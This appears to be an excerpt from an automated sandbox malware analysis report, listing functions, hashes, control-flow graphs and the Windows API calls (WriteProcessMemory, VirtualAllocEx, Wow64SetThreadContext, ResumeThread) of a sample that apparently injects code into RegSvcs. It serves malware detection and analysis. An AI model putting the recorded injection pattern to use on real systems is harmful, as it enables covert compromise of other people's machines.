                                                                        • Instruction ID: 2bbf5163815ec90e3a43654e6b2ccabf4b21f3b91e4827ee074f470d76f9bed9
                                                                        • Opcode Fuzzy Hash: 2017e99efdc780cc082693ff11056fcc503a1793e40b41b7078386becf6a7a48
                                                                        • Instruction Fuzzy Hash: 023100B1D00249AFDB10DF9AD884A9EFBF5EB48324F14842EE819A7310D775A940CFA0
                                                                        Function 06F27940 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 1316 6f27940-6f2798e 1318 6f27990-6f2799c 1316->1318 1319 6f2799e-6f279dd WriteProcessMemory 1316->1319 1318->1319 1321 6f279e6-6f27a16 1319->1321 1322 6f279df-6f279e5 1319->1322 1322->1321
                                                                        APIs
                                                                        • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 06F279D0
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.1507000276.0000000006F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F20000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_6f20000_VWGccZGgix.jbxd
                                                                        Similarity
                                                                        • API ID: MemoryProcessWrite
                                                                        • String ID:
                                                                        • API String ID: 3559483778-0
                                                                        • Opcode ID: 87ed25e6ee25bde2c289240db7a4b12de9419a4eef1105c773f002e389b5a1f9
                                                                        • Instruction ID: 00419ab8369ed009a703439c6405c89ad27b37933b973b35bac5daabb4966cba
                                                                        • Opcode Fuzzy Hash: 87ed25e6ee25bde2c289240db7a4b12de9419a4eef1105c773f002e389b5a1f9
                                                                        • Instruction Fuzzy Hash: E6211371D003599FDB10DFAAC881BDEBBF5BB48310F14842AE959A7240C7799950CBA0
                                                                        Function 06F2736A Relevance: 1.6, APIs: 1, Instructions: 68threadCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06F273EE
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.1507000276.0000000006F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F20000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_6f20000_VWGccZGgix.jbxd
                                                                        Similarity
                                                                        • API ID: ContextThreadWow64
                                                                        • String ID:
                                                                        • API String ID: 983334009-0
                                                                        • Opcode ID: 65fdce051cbfa935d2245cea9dd33fb1eed4cac4cfe7c6e92a25c938e3f9dbf6
                                                                        • Instruction ID: e66dabfe5ac491e8fc96cc7c285161c7f68a6aa21848cdfac78ed2caae7dd3ff
                                                                        • Opcode Fuzzy Hash: 65fdce051cbfa935d2245cea9dd33fb1eed4cac4cfe7c6e92a25c938e3f9dbf6
                                                                        • Instruction Fuzzy Hash: 18215771D003099FDB10DFAAC881BEFBBF4EB48320F148429D819A7240CB799945CFA1
                                                                        Function 0086D4C1 Relevance: 1.6, APIs: 1, Instructions: 64COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0086D54F
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.1496995206.0000000000860000.00000040.00000800.00020000.00000000.sdmp, Offset: 00860000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_860000_VWGccZGgix.jbxd
                                                                        Similarity
                                                                        • API ID: DuplicateHandle
                                                                        • String ID:
                                                                        • API String ID: 3793708945-0
                                                                        • Opcode ID: 6b19dad479282925934d70934262f81ccddd67461d915be6c93184f3caaab43d
                                                                        • Instruction ID: f8da1c383baa3c241304831bd6eae522b077ce50a1cbd14783ea3bb6c10b814e
                                                                        • Opcode Fuzzy Hash: 6b19dad479282925934d70934262f81ccddd67461d915be6c93184f3caaab43d
                                                                        • Instruction Fuzzy Hash: 3B21E3B5D00248AFDB10CFAAE884AEEBBF5FF48314F14801AE959A3311D375A944CF65
                                                                        Function 06F27A2F Relevance: 1.6, APIs: 1, Instructions: 64COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 06F27AB0
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.1507000276.0000000006F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F20000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_6f20000_VWGccZGgix.jbxd
                                                                        Similarity
                                                                        • API ID: MemoryProcessRead
                                                                        • String ID:
                                                                        • API String ID: 1726664587-0
                                                                        • Opcode ID: 0bbc3578d18492267fc9e20e24005188b8326c48cac189208cde9b76c30a63d7
                                                                        • Instruction ID: d2c099c79332dc52f8c69013f9b04ef1da932d4740843cad17d99dea7ebcdfca
                                                                        • Opcode Fuzzy Hash: 0bbc3578d18492267fc9e20e24005188b8326c48cac189208cde9b76c30a63d7
                                                                        • Instruction Fuzzy Hash: 67210371C003599FDB10DFAAD881AEEBBF5BF48320F14842AE519A7250C7799940CBA1
                                                                        Function 06F27A30 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 06F27AB0
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.1507000276.0000000006F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F20000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_6f20000_VWGccZGgix.jbxd
                                                                        Similarity
                                                                        • API ID: MemoryProcessRead
                                                                        • String ID:
                                                                        • API String ID: 1726664587-0
                                                                        • Opcode ID: cda609abc50c01719eea15dcb63bfee44adb707dda846d7393ff0b411f82b3f2
                                                                        • Instruction ID: 4c34bc6f285f3e067bd41163e81dbd355201d45891dd620e25d85b2714c853f4
                                                                        • Opcode Fuzzy Hash: cda609abc50c01719eea15dcb63bfee44adb707dda846d7393ff0b411f82b3f2
                                                                        • Instruction Fuzzy Hash: E6210371C003599FDB10DFAAD881AEEBBF5BF48320F14842AE519A7250C7799940CBA1
                                                                        Function 06F27370 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06F273EE
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.1507000276.0000000006F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F20000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_6f20000_VWGccZGgix.jbxd
                                                                        Similarity
                                                                        • API ID: ContextThreadWow64
                                                                        • String ID:
                                                                        • API String ID: 983334009-0
                                                                        • Opcode ID: e8046f6529717630dc10286c3255b3057b6c49df18bbf649192883906b096fd0
                                                                        • Instruction ID: 6c496343c987d1b39f63764d3755eacec3ccae9f76a6abf7f0263967f2f50a1f
                                                                        • Opcode Fuzzy Hash: e8046f6529717630dc10286c3255b3057b6c49df18bbf649192883906b096fd0
                                                                        • Instruction Fuzzy Hash: 47213571D003098FDB10DFAAC8857EEBBF4EF48220F14842AD819A7241CB78A945CFA1
                                                                        Function 0086D4C8 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0086D54F
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.1496995206.0000000000860000.00000040.00000800.00020000.00000000.sdmp, Offset: 00860000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_860000_VWGccZGgix.jbxd
                                                                        Similarity
                                                                        • API ID: DuplicateHandle
                                                                        • String ID:
                                                                        • API String ID: 3793708945-0
                                                                        • Opcode ID: cbc135cf59dadc210a88465dc0fe43d8eb1f71f750cbe184fb562712a5e9439a
                                                                        • Instruction ID: b78c664ebd3ce29f10a367da4003b2cb01da48c988739ceddb7ce357bc6c8a90
                                                                        • Opcode Fuzzy Hash: cbc135cf59dadc210a88465dc0fe43d8eb1f71f750cbe184fb562712a5e9439a
                                                                        • Instruction Fuzzy Hash: FB21B3B5D002489FDB10CFAAD984ADEBBF9FB48310F14841AE919A7350D375A944CF65
                                                                        Function 04BA339C Relevance: 1.6, APIs: 1, Instructions: 56windowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • CreateIconFromResourceEx.USER32(?,?,?,?,?,?,?,?,?,?,04BA37CA,?,?,?,?,?), ref: 04BA386F
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.1505472063.0000000004BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BA0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_4ba0000_VWGccZGgix.jbxd
                                                                        Similarity
                                                                        • API ID: CreateFromIconResource
                                                                        • String ID:
                                                                        • API String ID: 3668623891-0
                                                                        • Opcode ID: b43eddf9f2d8297b57802ccebf963fa9406cfb710bae671808b03e290d6caabe
                                                                        • Instruction ID: 08ab069200a2044f2464fe18bcfc09850a38ff327ffcbe09b788964cca5b9174
                                                                        • Opcode Fuzzy Hash: b43eddf9f2d8297b57802ccebf963fa9406cfb710bae671808b03e290d6caabe
                                                                        • Instruction Fuzzy Hash: 2D1167B5804349DFDB10CFAAD844BEEBFF8EB48310F14805AE914A7210C375A950CFA5
                                                                        Function 06F27880 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 06F278EE
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.1507000276.0000000006F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F20000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_6f20000_VWGccZGgix.jbxd
                                                                        Similarity
                                                                        • API ID: AllocVirtual
                                                                        • String ID:
                                                                        • API String ID: 4275171209-0
                                                                        • Opcode ID: f83a6a1113f9e8956d50b5d77504e4152e2a478fd72b88b54ac83eebb533db56
                                                                        • Instruction ID: e092342f2df829777e5f4f9640efe42e4ae8cda63d2624afe1a1dfcee02f85ed
                                                                        • Opcode Fuzzy Hash: f83a6a1113f9e8956d50b5d77504e4152e2a478fd72b88b54ac83eebb533db56
                                                                        • Instruction Fuzzy Hash: FE1126719003499FDB10DFAAD845BDFBBF5EB48320F148419E519A7250C776A950CFA1
                                                                        Function 06F272BF Relevance: 1.6, APIs: 1, Instructions: 50threadCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.1507000276.0000000006F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F20000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_6f20000_VWGccZGgix.jbxd
                                                                        Similarity
                                                                        • API ID: ResumeThread
                                                                        • String ID:
                                                                        • API String ID: 947044025-0
                                                                        • Opcode ID: 6a952ad397493431b4d46b05a9ea53e7726ba1d9235d9fd59675b78ac592a79e
                                                                        • Instruction ID: 328dbaff54168ab849e7e6b2e5431c17b598eab53ee470713816983dc8950b28
                                                                        • Opcode Fuzzy Hash: 6a952ad397493431b4d46b05a9ea53e7726ba1d9235d9fd59675b78ac592a79e
                                                                        • Instruction Fuzzy Hash: 5E113671D003498FDB20DFAAD8457DFFBF9AB88220F248419D519A7240CB79A940CFA5
                                                                        Function 06F2B348 Relevance: 1.6, APIs: 1, Instructions: 50windowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • PostMessageW.USER32(?,00000010,00000000,?), ref: 06F2B3AD
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.1507000276.0000000006F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F20000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_6f20000_VWGccZGgix.jbxd
                                                                        Similarity
                                                                        • API ID: MessagePost
                                                                        • String ID:
                                                                        • API String ID: 410705778-0
                                                                        • Opcode ID: 14a3f228e7bfd5bee0b17a1712c194bf38e7beacb0e2cb7fa5737c60fdec5742
                                                                        • Instruction ID: 768850e9dc76102f05004071f9b9d95780deb4cd1e92f4ab5bbfef440bdaf875
                                                                        • Opcode Fuzzy Hash: 14a3f228e7bfd5bee0b17a1712c194bf38e7beacb0e2cb7fa5737c60fdec5742
                                                                        • Instruction Fuzzy Hash: 0F11C2B5800349AFDB10DF9AD885BDEFBF8FB48314F20845AE959A7600C375A944CFA5
                                                                        Function 06F272C0 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.1507000276.0000000006F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F20000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_6f20000_VWGccZGgix.jbxd
                                                                        Similarity
                                                                        • API ID: ResumeThread
                                                                        • String ID:
                                                                        • API String ID: 947044025-0
                                                                        • Opcode ID: 625bc30022a292470f38071376a7d8400dbd7b22f8f67fcab3773c55292caed3
                                                                        • Instruction ID: cb8f4199afcae89fa67fd3f43c384667058a421f29fa2696076479e2fea4f0a3
                                                                        • Opcode Fuzzy Hash: 625bc30022a292470f38071376a7d8400dbd7b22f8f67fcab3773c55292caed3
                                                                        • Instruction Fuzzy Hash: 03113671D003498FDB20DFAAD8457DFFBF5AB88220F248419D519A7240CB79A940CFA5
                                                                        Function 0086B1E0 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetModuleHandleW.KERNELBASE(00000000), ref: 0086B246
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.1496995206.0000000000860000.00000040.00000800.00020000.00000000.sdmp, Offset: 00860000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_860000_VWGccZGgix.jbxd
                                                                        Similarity
                                                                        • API ID: HandleModule
                                                                        • String ID:
                                                                        • API String ID: 4139908857-0
                                                                        • Opcode ID: f176928fd9eb81decaaeb7dd93b5f34a9e8806743abfd7d2521e218b5be23f75
                                                                        • Instruction ID: cdd1e7cd8ed075ca5350dffd325de3dddd725ee15814dfd524c51aa960e40942
                                                                        • Opcode Fuzzy Hash: f176928fd9eb81decaaeb7dd93b5f34a9e8806743abfd7d2521e218b5be23f75
                                                                        • Instruction Fuzzy Hash: E3110FB6C006498FDB10CF9AD444A9EFBF4EF88324F11852AD529A7300C375A545CFA1
                                                                        Function 06F293B4 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • PostMessageW.USER32(?,00000010,00000000,?), ref: 06F2B3AD
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.1507000276.0000000006F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F20000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_6f20000_VWGccZGgix.jbxd
                                                                        Similarity
                                                                        • API ID: MessagePost
                                                                        • String ID:
                                                                        • API String ID: 410705778-0
                                                                        • Opcode ID: e9b499011ab48ce1099204c28ac7da0204372cc63a9cc3851d618bbbc05a2d2b
                                                                        • Instruction ID: 13185137addf3a3cdb763df1038515b1a795564443e59f8b48ef554ca5d7e8a1
                                                                        • Opcode Fuzzy Hash: e9b499011ab48ce1099204c28ac7da0204372cc63a9cc3851d618bbbc05a2d2b
                                                                        • Instruction Fuzzy Hash: D611F2B5800349DFDB10DF9AD885BDEBBF8FB48314F108459E958A7200C375A944CFA5
                                                                        Function 0080D4C4 Relevance: .1, Instructions: 75COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.1496623720.000000000080D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0080D000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_80d000_VWGccZGgix.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 754fab27b20bc07999c1bc472b60918d87dd8cedf11a7db68b58fe1288b1f129
                                                                        • Instruction ID: e17073963a8514999d4670977542d88110f9b7e8df1e44fc7a2e590f8b0d6a91
                                                                        • Opcode Fuzzy Hash: 754fab27b20bc07999c1bc472b60918d87dd8cedf11a7db68b58fe1288b1f129
                                                                        • Instruction Fuzzy Hash: 4F210372500344EFDB55DF94DDC0B26BF65FB88318F24C569EC098B296C336D856CAA2
                                                                        Function 0080D3D8 Relevance: .1, Instructions: 75COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.1496623720.000000000080D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0080D000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_80d000_VWGccZGgix.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 71fda6c04cdb2ccd5d7fafe096d3c487af1c12c241a1b09a46823f973f1acfa3
                                                                        • Instruction ID: 5f37a147a5e64abbe765b79cc113e13fe4708ef235c3acdbc93677400d391410
                                                                        • Opcode Fuzzy Hash: 71fda6c04cdb2ccd5d7fafe096d3c487af1c12c241a1b09a46823f973f1acfa3
                                                                        • Instruction Fuzzy Hash: 75212871500704DFDB54DF94DDC0B26BB65FB94328F24C169E9098F296C336E856CAA2
                                                                        Function 0081D220 Relevance: .1, Instructions: 72COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.1496682784.000000000081D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0081D000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_81d000_VWGccZGgix.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 8b52e524260c230bef76d0646e4bcd0c52857f68e8b0112815c1f27b359ec591
                                                                        • Instruction ID: 2b2ba103f319cf1416b22389e1865b58c31efe41757cb799ae515b0b2c9a9f95
                                                                        • Opcode Fuzzy Hash: 8b52e524260c230bef76d0646e4bcd0c52857f68e8b0112815c1f27b359ec591
                                                                        • Instruction Fuzzy Hash: 97210771504344EFDB14DF54D9C0B66BB69FF84318F24C56DE8498B246C33AE886CA62
                                                                        Function 0081D01C Relevance: .1, Instructions: 72COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.1496682784.000000000081D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0081D000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_81d000_VWGccZGgix.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: c8da10d3ac3d022a06ef1d58aa6a49cc66bf45662e192f756c1d5bc8326ba172
                                                                        • Instruction ID: c486ef628b976fec283d65c8f5696a91a9eeb5d521d42d365b885372d0587a53
                                                                        • Opcode Fuzzy Hash: c8da10d3ac3d022a06ef1d58aa6a49cc66bf45662e192f756c1d5bc8326ba172
                                                                        • Instruction Fuzzy Hash: 3221F575504744EFDB14DF24D980B56BB69FF88318F24C56DD8098B246C33AD887CA62
                                                                        Function 0080D3D3 Relevance: .1, Instructions: 56COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.1496623720.000000000080D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0080D000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_80d000_VWGccZGgix.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 0d1964494f132f00775c0e221f472ab769a33717f3edcd57285c8181465a4d2f
                                                                        • Instruction ID: 3949b099604ca41b8d04e5bbfe4ed02c77a222da64746828a9169825ef1374f4
                                                                        • Opcode Fuzzy Hash: 0d1964494f132f00775c0e221f472ab769a33717f3edcd57285c8181465a4d2f
                                                                        • Instruction Fuzzy Hash: 6011E172504740DFCB01CF40D9C0B16BF71FB94324F24C2A9D8094B656C33AE856CBA2
                                                                        Function 0080D4BF Relevance: .1, Instructions: 56COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.1496623720.000000000080D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0080D000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_80d000_VWGccZGgix.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 0d1964494f132f00775c0e221f472ab769a33717f3edcd57285c8181465a4d2f
                                                                        • Instruction ID: c43deca9178e1587a7fb82fbbc41c5289770c6ede80531ffa195540c23ef5aa9
                                                                        • Opcode Fuzzy Hash: 0d1964494f132f00775c0e221f472ab769a33717f3edcd57285c8181465a4d2f
                                                                        • Instruction Fuzzy Hash: 2711E172504280DFCB01CF50D9C0B16BF71FB88318F24C6A9DC094B696C336D85ACBA2
                                                                        Function 0081D017 Relevance: .1, Instructions: 53COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.1496682784.000000000081D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0081D000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_81d000_VWGccZGgix.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: a6f14a2633b0976cf55fba98dc8f49a251bcab79b87bdac7509de7911a20ab2c
                                                                        • Instruction ID: a6fc9f3d086e24ec356aa9cb38910978b1c773f11b9f62a9222623e9a7aa8b5c
                                                                        • Opcode Fuzzy Hash: a6f14a2633b0976cf55fba98dc8f49a251bcab79b87bdac7509de7911a20ab2c
                                                                        • Instruction Fuzzy Hash: 0B118B75504780DFCB15CF14D5C4B56FBA2FB88314F24C6AAD8498B656C33AD88ACBA2
                                                                        Function 0081D21B Relevance: .1, Instructions: 53COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.1496682784.000000000081D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0081D000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_81d000_VWGccZGgix.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: a6f14a2633b0976cf55fba98dc8f49a251bcab79b87bdac7509de7911a20ab2c
                                                                        • Instruction ID: e555e7b98f1c3c97c71d69cb9b4875800fd5d97226d1c030e16bff0835e6a4d0
                                                                        • Opcode Fuzzy Hash: a6f14a2633b0976cf55fba98dc8f49a251bcab79b87bdac7509de7911a20ab2c
                                                                        • Instruction Fuzzy Hash: 6D11BB75504280DFCB01CF14D5C4B15BFA1FB84314F24C6AAD8498B656C33AE88ACB62

                                                                        Execution Graph

                                                                        Execution Coverage:8.3%
                                                                        Dynamic/Decrypted Code Coverage:100%
                                                                        Signature Coverage:0%
                                                                        Total number of Nodes:16
                                                                        Total number of Limit Nodes:0
                                                                        execution_graph 26059 2c20871 26063 2c208c8 26059->26063 26068 2c208d8 26059->26068 26060 2c20889 26064 2c208d8 26063->26064 26073 2c20ce3 26064->26073 26077 2c20ce8 26064->26077 26065 2c2093e 26065->26060 26069 2c208fa 26068->26069 26071 2c20ce3 GetConsoleWindow 26069->26071 26072 2c20ce8 GetConsoleWindow 26069->26072 26070 2c2093e 26070->26060 26071->26070 26072->26070 26074 2c20ce8 GetConsoleWindow 26073->26074 26076 2c20d56 26074->26076 26076->26065 26078 2c20d26 GetConsoleWindow 26077->26078 26080 2c20d56 26078->26080 26080->26065

                                                                        Executed Functions

                                                                        Function 06DFC730 Relevance: 1.7, Strings: 1, Instructions: 422COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 817 6dfc730-6dfc759 818 6dfc75e-6dfc78e call 6dfbe70 817->818 819 6dfc75b 817->819 823 6dfc7ec-6dfc7fb call 6dfbe70 818->823 824 6dfc790-6dfc79f call 6dfbe70 818->824 819->818 831 6dfc7fd-6dfc813 823->831 832 6dfc815-6dfc829 823->832 829 6dfc7d4-6dfc7df 824->829 830 6dfc7a1-6dfc7b1 824->830 947 6dfc7e2 call 6dfcdf8 829->947 948 6dfc7e2 call 6dfcde8 829->948 830->829 833 6dfc7b3-6dfc7d2 call 6df7548 830->833 838 6dfc82b-6dfc869 831->838 832->838 833->823 833->829 835 6dfc7e8-6dfc7ea 835->838 842 6dfc86b-6dfc873 838->842 843 6dfc875-6dfc87b 838->843 844 6dfc87e-6dfc880 842->844 843->844 845 6dfc889-6dfc8ae call 6df06f8 call 6df0770 844->845 846 6dfc882-6dfc887 844->846 866 6dfc8c3 845->866 867 6dfc8b0-6dfc8c1 845->867 847 6dfc8c6-6dfc8c8 846->847 848 6dfc8ca-6dfc8ce 847->848 849 6dfc910-6dfc917 847->849 848->849 851 6dfc8d0-6dfc8f9 848->851 853 6dfcb8e-6dfcbbf 849->853 854 6dfc91d-6dfc927 call 6dfbe50 849->854 863 6dfc8fb-6dfc8fd 851->863 864 6dfc905-6dfc90b 851->864 874 6dfcbcb-6dfcbd2 853->874 875 6dfcbc1-6dfcbc3 853->875 861 6dfc99d-6dfc9a4 854->861 862 6dfc929-6dfc92d 854->862 870 6dfc9aa-6dfc9bc 861->870 871 6dfca32-6dfca3b 861->871 868 6dfc92f-6dfc946 862->868 869 6dfc94b-6dfc998 862->869 863->864 873 6dfcc4f-6dfcc56 864->873 866->847 867->847 868->873 869->853 870->871 885 6dfc9be-6dfc9c2 870->885 876 6dfca3d-6dfca43 871->876 877 6dfca46-6dfca8b call 6df9170 871->877 882 6dfcbda-6dfcbe0 874->882 883 6dfcbd4-6dfcbd8 874->883 875->874 876->877 877->853 921 6dfca91-6dfca95 877->921 886 6dfcbea-6dfcbee 882->886 887 6dfcbe2-6dfcbe4 882->887 883->886 890 6dfc9c4-6dfc9db 885->890 891 6dfc9e0-6dfca2d 885->891 894 6dfcc14-6dfcc1e call 6dfbe50 886->894 895 6dfcbf0-6dfcbf9 886->895 887->886 893 6dfcbe6 887->893 890->873 891->853 893->886 906 6dfcc40-6dfcc44 894->906 907 6dfcc20-6dfcc37 894->907 898 6dfcbfb-6dfcc01 895->898 899 6dfcc03-6dfcc0a 895->899 900 6dfcc0d 898->900 899->900 900->894 910 6dfcc4d 906->910 911 6dfcc46 906->911 907->906 922 6dfcc39 907->922 910->873 911->910 923 6dfca97-6dfcaae 921->923 924 6dfcab3-6dfcab6 921->924 922->906 923->873 926 6dfcabc-6dfcb3f 924->926 927 6dfcb41-6dfcb83 924->927 926->853 927->853 947->835 948->835
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000D.00000002.1666702910.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_13_2_6df0000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: @
                                                                        • API String ID: 0-2766056989
                                                                        • Opcode ID: afd00d5bb81f267b4458ced93afc60bfc2677ecd9f336e841723aa9abab114f0
                                                                        • Instruction ID: c8e02255900dd59fb8deac58fe906fbb9124811197e59a0f53e61331da594e1c
                                                                        • Opcode Fuzzy Hash: afd00d5bb81f267b4458ced93afc60bfc2677ecd9f336e841723aa9abab114f0
                                                                        • Instruction Fuzzy Hash: 3C026B30A10209DFDB99DFA4D494AAE7BB3FF88300F158469E6169B390DB35DD91CB90
                                                                        Function 02C20CE3 Relevance: 1.6, APIs: 1, Instructions: 50COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 949 2c20ce3-2c20d54 GetConsoleWindow 953 2c20d56-2c20d5c 949->953 954 2c20d5d-2c20d82 949->954 953->954
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 0000000D.00000002.1629356994.0000000002C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C20000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_13_2_2c20000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID: ConsoleWindow
                                                                        • String ID:
                                                                        • API String ID: 2863861424-0
                                                                        • Opcode ID: 9dccd060a2c8a3e3c0a0edd69c6816db9cdf75a28de7d9513a5faa3ebf27ef5d
                                                                        • Instruction ID: 8b220ba88e9de21401ab791cebcd11270098a7e9b97bc0091accc260b326b3db
                                                                        • Opcode Fuzzy Hash: 9dccd060a2c8a3e3c0a0edd69c6816db9cdf75a28de7d9513a5faa3ebf27ef5d
                                                                        • Instruction Fuzzy Hash: 63115571D003498FDB20DFAAC8447DFFFF5EB89224F24885AC059A7240CB796545CBA0
